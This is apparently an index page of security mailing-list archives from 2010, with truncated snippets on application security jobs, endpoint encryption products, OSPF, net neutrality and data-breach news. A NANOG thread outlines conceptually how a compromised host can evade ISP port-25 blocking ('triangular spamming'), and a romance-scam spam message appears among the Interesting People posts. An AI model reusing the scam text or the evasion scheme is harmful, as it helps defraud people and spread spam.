the rules? That is, that they use only published APIs and such? Well, then, you really have your work cut out for you,
because that's not all that your customers expect.'
To read the complete article see:...
Secure code review/application penetration testing/security architecture positions at Cigital
Joanne Gaitanis (Aug 12)
Good afternoon!
Due to rapid growth/increased client base, we are looking for Application Security Consultants (full time) at all
levels, from 1-20 years experience, from entry level to management.
If qualified and interested, send me your resume in MS WORD doc format to jgaitanis () cigital com
Peruse our website @ www.cigital.com!
Must be willing to travel as needed (~25%).
Position Locations: New York City,...
Two resources
Gary McGraw (Aug 09)
hi sc-l,
We just made the Richard Clarke Silver Bullet podcast transcript live. This special 50th edition of Silver Bullet
interview shows up in the July/August IEEE Security & Privacy magazine. A high definition video of the interview is
also available on the silver bullet web page. You can find a pdf copy of the transcript here:
http://www.cigital.com/silverbullet/shows/silverbullet-050-rclarke.pdf
Also of note, the mainstream...
2nd. OWASP Ibero-American Web-Applications Security conference (IBWAS’10) - Call for Training
Carlos Serrão (Aug 01)
2nd. OWASP Ibero-American Web-Applications Security conference (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com
**CALL FOR TRAINING SESSIONS**
IBWAS and OWASP are currently soliciting training proposals for the OWASP Ibero-American Web Applications Security 2010
Conference (IBWAS'10) which will take place at ISCTE-IUL, Lisboa, Portugal, on November 24 through November 26, 2010....
2nd. OWASP Ibero-American Web Applications Security Conference 2010 (IBWAS'10) - Call for Papers
Carlos Serrão (Aug 01)
2nd. OWASP Ibero-American Web-Applications Security Conference 2010 (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com
Call for Papers
Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the
extensive deployment and use of web-based applications and web services as a way to develop new and flexible...
Re: Static code review for iPhone developers?
Kenneth Van Wyk (Jul 29)
Thanks to all who responded. Great suggestions.
Most focused on the (now) built-in Clang analysis engine (and front-end for LLVM) that Dan Cornell cited here.
(http://developer.apple.com/mac/library/featuredarticles/StaticAnalysis/index.html)
Clang looks like a useful starting point, as it looks for all sorts of common mistakes found in the C family, including
C++ and Objective C. Memory leaks, uninitialized variables, type mismatches,...
Re: Static code review for iPhone developers?
Dan Cornell (Jul 29)
XCode has a built in static analysis tool, but I'm not sure how thorough it is:
<http://developer.apple.com/mac/library/featuredarticles/StaticAnalysis/index.html>
Not sure if any of the commercial folks support Objective-C yet.
Thanks,
Dan
Static code review for iPhone developers?
Kenneth Van Wyk (Jul 29)
Greetings SC-L folks. Hey, I have a quick question I'd like to submit to this group.
Anyone know of any static code analysis tools that can scan an iPhone app package? Something that integrates with the
Xcode SDK and can at the very least scan through all of the Objective C in the src tree is what I'm looking for. Any
SCA product vendors currently doing this? Please contact me on or off list.
Cheers,
Ken
-----
Kenneth R. van Wyk
KRvW...
Educause Security Discussion — Securing networks and computers in an academic environment.
Re: Fwd: bit OT -- Wifi technology
Barry Lynam (Sep 02)
Hi,
Can't really comment on the cisco infrastructure etc. but I'm interested in
hearing about certificate issues. Each year when the certificate expires
and requires changing, we go through a huge amount of pain testing devices
just to see how they will behave so the helpdesk knows what to expect. Do
others have same issues? Different devices with different version of code
behave differently.
We use WEP2 enterprise, 802.1x, PEAP and some...
Fwd: bit OT -- Wifi technology
Russell Fulton (Sep 02)
Hi Folks
this stuff has security implications but really is not primarily a security topic so please forgive me for taking
liberties with the list.
Currently we are a cisco shop as far as our wireless infrastructure goes -- enterprise WPA2, EAP, PEAP, authenticated
via radius, but are now looking at alternatives.
One thing that we are aware of is the convergence of traditional wifi and cellphone technology. It seems clear that
'4G' will...
Re: Question about Endpoint Encryption
Walter Petruska (Sep 02)
University of San Francisco has been using Utimaco's SafeGuard product for
FDE for a few years now. They've now been acquired by Sophos, whom we use
for the Endpoint Protection and Control (DLP, A/V, etc.). The two consoles
should be integrated at some point in the future- which will be a big help.
We're happy with Sophos for both the WDE and Endpoint Protection, especially
in view of the poor performance of many others in this area from a...
Re: Question about Endpoint Encryption
SCHALIP, MICHAEL (Sep 02)
Actually - GuardianEdge has been purchased by Symantec - we just implemented it and it's actually working quite well!!
We like that we can interface the whole thing with Symantec/Altiris.....
In a previous life - we used Entrust, which also worked well - but it's a lot of work to get the key authority set up
right, especially if you are serving up to a nationwide customer set....
M
-----Original Message-----
From: The EDUCAUSE Security...
Re: Question about Endpoint Encryption
Basgen, Brian (Sep 02)
We are also using Checkpoint. It has been a usable product that has worked for us on a fairly limited scale (250 high
risk machines), but it is not an enterprise product. They are trying to make it into an enterprise product via their
"security suite", but I think they are a few years away. That said, from the security side, I think it is one of the
better products out there. Last time we looked 2 years ago, many products out there...
Re: Question about Endpoint Encryption
Jason Testart (Sep 02)
I'm about to roll-out SecureDoc by WinMagic. I've delayed our
deployment only because of usability issues on Windows 7/Vista. It has
a feature to synchronize the password for the encryption key (file) with
the operating system password that I am keen on using. It worked solid
with XP but had problems with Vista/7 (because of move from the GINA to
the "credential provider" model, I suppose). I just now have a version
that works...
Re: Question about Endpoint Encryption
James Farr '05 (Sep 02)
I have looked at several vendors. I am concerned about laptops, but also
removable media encryption. I see all the desktops out there and all those
flash drives, CDs and DVDs. The likelihood of finding out about a
lost/stolen $10 flash drive is much less than a $$$ laptop.
Right now the two vendors that are at the top of my list are Credant
Technologies and PGP. I will be interested in others' experience and what
solutions others are...
Re: Question about Endpoint Encryption
Roger Safian (Sep 02)
FWIW we used to use Pointsec. It was a decent product, and I thought the support we got from both Pointsec and our local reseller was really first class. Once Pointsec was bought by Checkpoint, things just went downhill fast.
This year we re-negotiated our anti-viral contract with Symantec. As part of the negotiation we secured a special price for the encryption product. It works better, has a nice management interface, and, best of...
Re: Question about Endpoint Encryption
Hanson, Mike (Sep 02)
Gregory,
We use Checkpoint endpoint protection and I can say I do not recommend it.
The product was originally from Pointsec and they were a small and
responsive company with a decent product. Then Checkpoint bought them and it
has been more or less downhill since then. Checkpoint is supposedly doing a
complete rewrite of the product now to address problems. We currently have
three different versions of Checkpoint running, since each version is...
Re: Question about Endpoint Encryption
Joel Rosenblatt (Sep 02)
Hi,
We are using GE and have not had these kinds of problems .. the only time we see failures is when there are underlying hardware problems or when the wrong version of the product gets installed.
You're welcome to pick our brains (for what that is worth :-) - Let me know offline and I'll put you in touch with my GE expert.
Thanks,
Joel Rosenblatt
Joel Rosenblatt, Manager Network & Computer Security
Columbia Information Security Office...
Re: Question about Endpoint Encryption
David Grisham (Sep 02)
Thank you Gregory,
We purchased McAfee Total Protection suite (endpoint encryption, DLP, device control). We wanted central control from
EPO. So we were sold and installed the latest Version 6. That version turned out to be really a version 1 rewrite and
our pilot found too many problems to deploy across the enterprise.
-- Also we were told we could use DLP with version 6 when we purchased. Turns out that feature won't be released until...
Cert Service Topic of September 14 InCommon Online Forum
Valerie Vogel (Sep 02)
----------
InCommon Online Forum: The InCommon Cert Service
Tuesday, September 14, 2010
1 p.m. EDT / Noon CDT / 11 a.m. MDT / 10 a.m. PDT
http://www.incommon.org/
----------
InCommon has launched a new certificate service, providing unlimited
certificates at one low fee. The research and higher education community
developed this service for pragmatic reasons (primarily to reduce costs)
and innovative reasons (the first real step toward signed...
Question about Endpoint Encryption
Gregory N Pendergast (Sep 02)
I'm looking for feedback on endpoint encryption solutions - both
products you've used or are using and your experiences. VCU purchased
GuardianEdge some time ago, but we've run into a number of problems that
have delayed our deployment and caused me to lose confidence in the
product, to the point that I'm considering dropping it and looking for a
different solution. The problems we've encountered are generally
post-installation failures...
Re: attempts sending fake phishing messages to students and/or employees
Morrow Long (Sep 02)
Thanks. We liked RIT's idea of having a student walk around in a fish
costume and used it for phishing (as well as social networking
security) awareness for frosh orientation (and other personal
appearances):
http://www.yaledailynews.com/news/2010/sep/02/new-its-mascot-hooks-freshmen/
- Morrow
Re: firewall requirements for applications
Charles Buchholtz (Sep 01)
Here are some factors that may be involved in decision/policy to
require different levels of firewall for different applications:
Ingress restrictions
1) Do the applications have the same level of design / code review?
2) Do the applications have the same level of change management / review ?
3) Does the operating environment (OS, libraries, configuration) have
the same security model / review?
4) Does the operating environment (OS,...
NANOG — The North American Network Operators' Group discusses fundamental Internet infrastructure issues such as routing, IP address allocation, and containing malicious activity.
Re: largest OSPF core
Randy Bush (Sep 02)
i believe the original poster asked about actual operating deployment,
not theory.
and, i suspect one wants to know about full mesh under real load, i.e.
topology change, which can be exciting when one gets to a network of
significant size.
randy
Re: Road Runner Abuse Contact
William Pitcock (Sep 02)
Quoting that website:
| The Postmaster team is part of the Road Runner Mail Operations
| team, and we are responsible for blocking and filtering mail
| that transits our servers; however, while we have an active
| Abuse organization and work closely with them, this is not the
| place to report incidents of spam or abuse coming from Road
| Runner's mail servers or from our network in general, as Abuse
| is a separate organization here.
William
Re: Road Runner Abuse Contact
J.D. Falk (Sep 02)
http://postmaster.rr.com/ is a good place to start.
Re: ISP port blocking practice
Zhiyun Qian (Sep 02)
You are exactly right. We also talked about stateful firewalls that can protect the GoodNet. For a NAT box, depending on the
type of NAT, it is possible to set up port forwarding on the router (mostly home routers) via UPnP without any
authentication (I think many home routers are like this by default). And since the machine in GoodNet is also
compromised, it would not be difficult to achieve this.
Regards.
-Zhiyun
Re: ISP port blocking practice
William Herrin (Sep 02)
If I understand your idea correctly:
1. GoodNet filters TCP destination port 25 packets from his customer
PwndBox, preventing PwndBox from spamming.
2. BadGuy on BadNet sends a forged TCP SYN packet to SpamVictim
allegedly from PwndBox on GoodNet.
3. PwndBox receives the response packets from SpamVictim and tunnels
them to BadGuy allowing BadGuy to complete the spam.
4. GoodNet didn't stop it because PwndBox never sent any packets to TCP port...
Re: ISP port blocking practice
Zhiyun Qian (Sep 02)
Sorry for bringing this old topic back. But we have made some academic effort investigating the spamming behaviors
using asymmetric routing (we named it "triangular spamming"). This work appeared in this year's IEEE Security & Privacy
conference. You can take a look at it if you are interested (and feedback is welcome):
http://www.eecs.umich.edu/~zhiyunq/pub/oakland10_triangular-spamming.pdf
One of the high-level findings is...
Re: largest OSPF core
Mark Smith (Sep 02)
Presuming OSPF and IS-IS SPF costs are fairly similar, the following
page from "The complete IS-IS routing protocol" (really quite a good
book, a bit of a shame that there are occasional minor errors that
better technical editing would have picked up) shows that relatively
modern (although a number of years old now) routers can perform SPF
calcs on SPF databases with 10000 routers and 25000 links in less than
a second. From that, it...
Re: largest OSPF core
Chuck Anderson (Sep 02)
Seems silly to migrate your existing OSPFv2 to an extra instance of
OSPFv3, leaving 2 separate OSPFv3 instances. Why not just stick with
your existing OSPFv2 and add OSPFv3 for IPv6? Or if you want to
migrate your IPv4 IGP, go directly to IS-IS so you can have a single
link-state database, single process, etc. for both IPv4 and IPv6.
RE: largest OSPF core
Deepak Jain (Sep 02)
http://www.cisco.com/web/strategy/docs/gov/OSPFv3_aag.pdf
Thank you. Apparently Cisco supports it (or something like it) too.
Deepak
Re: Road Runner Abuse Contact
Andrew Kirch (Sep 02)
Did you call Chuck Jones?
Re: Road Runner Abuse Contact
harbor235 (Sep 02)
I always feel bad when roadrunners get abused .........
Road Runner Abuse Contact
Brad Fleming (Sep 02)
Any Road Runner abuse reps on the list?
If so, could you please contact me off-list?
Re: Level3 Contact
Alan Bryant (Sep 02)
Beth Manning
Beth.Manning () level3 com
Re: largest OSPF core
Owen DeLong (Sep 02)
Sent from my iPad
You left out the option of using ospf3 to do both v4 and v6. Works on juniper and foundry at least.
Owen
Level3 Contact
Nick Olsen (Sep 02)
Anyone have a Level3 sales contact?
I've called the 800 number and was told I would get a call in 48 hours, a
week later, and a second call into them and I still haven't gotten a call
back.
Nick Olsen
Network Operations
(321) 205-1100 x106
Interesting People — David Farber moderates this list for discussion involving internet governance, infrastructure, and any other topics he finds fascinating
Hello dear
Victoria Goodluck (Aug 15)
Nice to meet you.
My name is miss Victoria.i saw your profile today became intrested in you,i will also like to know more about you,and i
want you to send a mail to my email address so that i can give you my picture for you to know whom l am. .i believe we
can move from here.I am waiting to here from you. above all remeber that distance or colour does not matter but love
matters alot in life.
Please reply me back.yours VICTORIA
FCC Calls Off Net Neutrality Talks
Dave Farber (Aug 05)
Begin forwarded message:
> From: Richard Forno <rforno () infowarrior org>
> Date: August 5, 2010 1:27:48 PM PDT
> To: List Infowarrior <infowarrior () attrition org>
> Cc: Farber Dave <dave () farber net>
> Subject: FCC Calls Off Net Neutrality Talks
>
> FCC Calls Off Net Neutrality Talks
>
> http://online.wsj.com/article/SB10001424052748703748904575411632530886558.html?
>
> By AMY SCHATZ...
re eGoogle and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
Begin forwarded message:
> From: Andrew C Burnette <acb () acb net>
> Date: August 5, 2010 11:04:02 AM PDT
> To: dave () farber net
> Subject: Re: [IP] Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>
> Dave,
>
> for IP if you wish.
>
> I would guess this could be overlap of timing between the FCC
> discussions and the always ongoing issues of interconnectivity (peering)
> in...
Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet again
Dave Farber (Aug 05)
Begin forwarded message:
> From: Mikki Barry <ooblick () ego org>
> Date: August 5, 2010 10:41:33 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: Re: [IP] Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet
> again
>
> You know, Dave, we must not be the only people who have had apple mail losing our email. I have been around and
>...
paper on technology manias and gullibility, of some interest to IP list
Dave Farber (Aug 05)
Begin forwarded message:
> From: Andrew Odlyzko <odlyzko () umn edu>
> Date: August 5, 2010 10:11:06 AM PDT
> To: dave () farber net
> Subject: paper on technology manias and gullibility, of some interest to IP list
>
> Dave,
>
> Since the readers of the IP list are discussed in Section 5 of this
> paper, they might like to learn of it directly, so they have a chance
> to react.
>
> Best regards,...
some "facts" Verizon, Too! re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
Begin forwarded message:
> From: "Sullivan, Michael" <MSullivan () wbklaw com>
> Date: August 5, 2010 9:07:52 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: RE: [IP] Verizon, Too! re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority -
> NYTimes.com
>
> Both Verizon and Google have specifically said the NY Times article got it all wrong.
>
>...
re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
Begin forwarded message:
> From: h_bray () globe com
> Date: August 5, 2010 8:42:21 AM PDT
> To: dave () farber net
> Cc: ip <ip () v2 listbox com>
> Subject: Re: [IP] GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>
> FWIW, Google says the NY Times story is "quite simply wrong."
>
> http://www.pcmag.com/article2/0,2817,2367436,00.asp
>
>
>...
re Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
Begin forwarded message:
> From: George Ou <George.Ou () digitalsociety org>
> Date: August 5, 2010 8:06:09 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: RE: [IP] Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>
> For IP if you wish.
>
> This story is devoid of facts and self contradictory.
>...
Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet again
Dave Farber (Aug 05)
Dave
Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
http://www.nytimes.com/2010/08/05/technology/05secret.html?_r=1
For a change -- I will not say " I told you so". Djf
Google, Verizon, the FCC and Net Neutrality
Dave Farber (Aug 04)
Begin forwarded message:
> From: Gene Gaines <gene.gaines () gainesgroup com>
> Date: August 4, 2010 9:33:59 PM PDT
> To: David Farber <dave () farber net>
> Subject: Google, Verizon, the FCC and Net Neutrality
>
> Two views of a stunningly important issue
>
> FIRST: From the New York Times, Aug 4, 2010:
>
> Google and Verizon in Talks on Selling Internet Priority
>
> WASHINGTON — Google and...
Outsourcing We Can Believe In
Dave Farber (Aug 04)
Begin forwarded message:
> From: Randall Webmail <rvh40 () insightbb com>
> Date: August 4, 2010 2:28:51 PM PDT
> To: johnmacsgroup () yahoogroups com, dewayne () warpspeed com, dave () farber net
> Subject: Outsourcing We Can Believe In
>
> U.S. To Train 3,000 Offshore IT Workers
>
> $22 million, federally-backed program aims to help outsourcers in South Asia become more fluent in areas like Java
>...
Book review: Skating on Stilts - WSJ.com
Dave Farber (Aug 04)
http://online.wsj.com/article/SB10001424052748703545604575407380884722858.html
So they lied. This is surprising why?
Dave Farber (Aug 04)
Begin forwarded message:
> From: Randall Webmail <rvh40 () insightbb com>
> Date: August 4, 2010 8:36:43 AM PDT
> To: johnmacsgroup () yahoogroups com, dewayne () warpspeed com, dave () farber net
> Subject: So they lied. This is surprising why?
>
> "For the last few years, federal agencies have defended body scanning by insisting that all images will be discarded
> as soon as they're viewed. The...
YUM YUM
Dave Farber (Aug 03)
That is Jakes in Portland Oregon
Begin forwarded message:
> From: Dave Farber <dave () farber net>
> Date: August 3, 2010 4:41:04 PM PDT
> To: ip <ip () v2 listbox com>
> Subject: [IP] YUM YUM
> Reply-To: dave () farber net
>
> I am sitting at Jakes having finished a bowl of Manhattan clam chowder.
>
> Wonderful
>
>
The RISKS Forum — Peter G. Neumann moderates this regular digest of current events which demonstrate risks to the public in computers and related systems. Security risks are often discussed.
Risks Digest 26.14
RISKS List Owner (Aug 30)
RISKS-LIST: Risks-Forum Digest Monday 30 August 2010 Volume 26 : Issue 14
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.14.html>
The current issue can be...
Risks Digest 26.13
RISKS List Owner (Aug 02)
RISKS-LIST: Risks-Forum Digest Monday 2 August 2010 Volume 26 : Issue 13
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.13.html>
The current issue can be...
Risks Digest 26.12
RISKS List Owner (Jul 30)
RISKS-LIST: Risks-Forum Digest Friday 30 July 2010 Volume 26 : Issue 12
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.12.html>
The current issue can be...
Risks Digest 26.11
RISKS List Owner (Jul 21)
RISKS-LIST: Risks-Forum Digest Wednesday 21 July 2010 Volume 26 : Issue 11
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.11.html>
The current issue can be...
Risks Digest 26.10
RISKS List Owner (Jul 10)
RISKS-LIST: Risks-Forum Digest Saturday 10 July 2010 Volume 26 : Issue 10
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.10.html>
The current issue can be...
Risks Digest 26.09
RISKS List Owner (Jul 03)
RISKS-LIST: Risks-Forum Digest Saturday 3 July 2010 Volume 26 : Issue 09
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.09.html>
The current issue can be...
Risks Digest 26.08
RISKS List Owner (Jun 10)
RISKS-LIST: Risks-Forum Digest Thursday 10 June 2010 Volume 26 : Issue 08
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.08.html>
The current issue can be...
Risks Digest 26.07
RISKS List Owner (May 29)
RISKS-LIST: Risks-Forum Digest Saturday 29 May 2010 Volume 26 : Issue 07
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.07.html>
The current issue can be...
Risks Digest 26.06
RISKS List Owner (May 08)
RISKS-LIST: Risks-Forum Digest Saturday 8 May 2010 Volume 26 : Issue 06
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.06.html>
The current issue can be...
Risks Digest 26.05
RISKS List Owner (May 04)
RISKS-LIST: Risks-Forum Digest Tuesday 4 April 2010 Volume 26 : Issue 05
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.05.html>
The current issue can be...
Risks Digest 26.04
RISKS List Owner (Apr 28)
RISKS-LIST: Risks-Forum Digest Wednesday 28 April 2010 Volume 26 : Issue 04
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.04.html>
The current issue can be...
Risks Digest 26.03
RISKS List Owner (Apr 25)
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.03.html>
The current issue can be found at
<http://www.csl.sri.com/users/risko/risks.txt>
Contents:...
Risks Digest 26.02
RISKS List Owner (Apr 18)
RISKS-LIST: Risks-Forum Digest Sunday 18 April 2010 Volume 26 : Issue 02
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.02.html>
The current issue can be...
Risks Digest 26.01
RISKS List Owner (Apr 08)
RISKS-LIST: Risks-Forum Digest Thursday 8 April 2010 Volume 26 : Issue 01
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.01.html>
The current issue can be...
Data Loss — Data Loss covers large-scale personal data loss and theft incidents. This archive combines the main list (news releases) and the discussion list.
US scammer bought, resold nearly 27,000 credit card numbers (fwd)
lyger (Sep 02)
http://www.google.com/hostednews/afp/article/ALeqM5h1Yw13itwyTojTcXDJntFSkMh_jg
A US man pleaded guilty Wednesday to fraudulently obtaining nearly 27,000
credit card numbers and selling them on to other scammers, who used them to
make purchases.
Juan Javier Cardenas, 45, admitted at a plea hearing in a district court in
Florida that he had "purchased stolen credit card information from a
co-conspirator" using the Internet, a...
Canada: 600 B.C. patients' data in stolen laptop (fwd)
lyger (Sep 02)
http://www.cbc.ca/health/story/2010/09/02/bc-stolen-laptop-patient-data.html
Personal information about more than 600 patients of the Fraser Health
Authority in British Columbia is contained in a laptop stolen from Burnaby
General Hospital.
The laptop, stolen Aug. 21 from the pulmonary function lab, contained such
patient information as names, birth dates and personal health card numbers.
Contrary to hospital policy, the information was not...
Email remains a major vector of enterprise data loss
lyger (Sep 02)
http://www.fiercecio.com/techwatch/story/e-mail-remains-major-vector-enterprise-data-loss/2010-08-31
A new survey of some 261 U.S. enterprises with more than 1,000 employees
has found that email remains the number one source of data loss risks.
Indeed, 35 percent of companies say they investigated the exposure of
confidential information via this medium in the last 12 months. Another 20
percent say they have terminated an employee for...
US scammer bought, resold nearly 27,000 credit card numbers
lyger (Sep 02)
http://www.google.com/hostednews/afp/article/ALeqM5h1Yw13itwyTojTcXDJntFSkMh_jg
A US man pleaded guilty Wednesday to fraudulently obtaining nearly 27,000
credit card numbers and selling them on to other scammers, who used them
to make purchases.
Juan Javier Cardenas, 45, admitted at a plea hearing in a district court
in Florida that he had "purchased stolen credit card information from a
co-conspirator" using the Internet, a...
Canada: 600 B.C. patients' data in stolen laptop
lyger (Sep 02)
http://www.cbc.ca/health/story/2010/09/02/bc-stolen-laptop-patient-data.html
Personal information about more than 600 patients of the Fraser Health
Authority in British Columbia is contained in a laptop stolen from Burnaby
General Hospital.
The laptop, stolen Aug. 21 from the pulmonary function lab, contained such
patient information as names, birth dates and personal health card
numbers.
Contrary to hospital policy, the information was...
Scottish public sector leaks data, most of it unencrypted
security curmudgeon (Sep 02)
http://www.computerworlduk.com/news/public-sector/3237477/scottish-public-sector-leaks-data-most-of-it-unencrypted/
Scottish public sector leaks data, most of it unencrypted
One council manages to 'lose' 60 PCs from schools
By Anh Nguyen | Computerworld UK | Published 08:50, 01 September 10
Most of the data lost by public sector bodies in Scotland was unencrypted,
a Freedom of Information (FOI) request has revealed.
The FOI request, made by...
Data breach leads to loss of details of over 8,300 P.K. Yonge employees, students
security curmudgeon (Sep 02)
http://www.endpoint-security.info/2010/09/02/pk-yonge-laptop-theft-8300-people-affected/
Data breach leads to loss of details of over 8,300 P.K. Yonge employees,
students
September 2nd, 2010 by Agent Smith
A laptop computer stolen last month endangered the personal information of
over 8,300 current and former students and employees of P.K. Yonge
Development Research School, a kindergarten-through-grade-12 laboratory
school affiliated with...
Wow, pardon that last subject line..
security curmudgeon (Sep 01)
A bad cut and paste doesn't begin to explain the out of context IM snippet
that ended up as the subject. Apologies =)
Heartland settles with Discover over breach
security curmudgeon (Sep 01)
http://www.scmagazineus.com/heartland-settles-with-discover-over-breach/article/178116/
Heartland settles with Discover over breach
Dan Kaplan
September 01, 2010
Heartland Payment Systems, the New Jersey-based credit card processor that
fell victim to the largest reported data breach of all time, announced on
Wednesday that it will settle with Discover for $5 million. Heartland
already has settled with Visa for $60 million and MasterCard...
State retiree data breached
security curmudgeon (Sep 01)
---------- Forwarded message ----------
From: InfoSec News <alerts () infosecnews org>
http://www.delawareonline.com/article/20100831/NEWS02/8310324/State+retiree+data+breached
By J.L. MILLER
The News Journal
August 31, 2010
DOVER -- In a data breach that one security expert said could be worth
millions of dollars to scam artists, Aon Consulting, the state's benefits
consultant, inadvertently posted personal information of about 22,000...
Privacy commissioner orders shutdown of BCLC online gambling site until glitches can be fixed
security curmudgeon (Aug 31)
http://www.theprovince.com/technology/Privacy+commissioner+orders+shutdown+BCLC+online+gambling+site+until+glitches+fixed/3329791/story.html
Privacy commissioner orders shutdown of BCLC online gambling site until
glitches can be fixed
By Andy Ivens
The Province July 28, 2010
Provincial privacy commissioner Elizabeth Denham has ordered the
government's online gambling website to remain shut down until the B.C.
Lottery Corp. can find out what...
State employee retirees' Social Security numbers posted on website by vendor
kirniki (Aug 30)
http://www.newarkpostonline.com/articles/2010/08/30/news/doc4c7bc3beab609126028198.txt
State of Delaware consultant, Aon Consulting is mailing letters to
approximately 22,000 State of Delaware retirees, after the company
included Social Security Numbers, gender information and dates of
birth in a Request for Proposal (RFP) the company prepared for the
state.
[..]
Re: [Dataloss] E-mail Causes Most Enterprise Data Loss
Al (Aug 30)
There are many kinds of breaches. What we see via Dataloss is a sub-set of
the whole.
Dataloss seems more concerned with those that involve significant volume of
individual people's private data, not leakage of confidential corporate data
through social media. But the fact remains that many breaches occur because
some employee sends via e-mail an attachment listing info on many customers,
including bank account info. It is human error. It...
Re: [Dataloss] Study: About One-Fifth of Breached Entities Were PCI-Compliant
Al (Aug 30)
Thanks for corrections to my understandings.
It is evident that we are talking about multiple reports and data sets, from
which different conclusions may be drawn.
I have not looked at ALL the Verizon reports, but I think it was last year
they said that PCI was NOT the purpose of the report, it was to analyze how
the places got breached, which they had insider data on. The PCI
perspective there was kind of an after-thought, because of high...
Re: [Dataloss] E-mail Causes Most Enterprise Data Loss
Uzi Yair (Aug 30)
This report is a waste of valuable reading time but an attempt of a
vendor to promote email security.
There are 65,535 ports and they are saying the email causes most data
loss. I have been monitoring this group for a long while. I do not
recall the last time there was an event from an email violation.
If indeed corporation were monitoring all 65,535 ports, then I would be
less skeptical.
Regards,
*Uzi Yair*| uyair <mailto:uyair ()...
Metasploit — Development discussion for Metasploit, the premier open source remote exploitation tool
Re: Dynamically Generated Final Stages
Ty Miller (Sep 02)
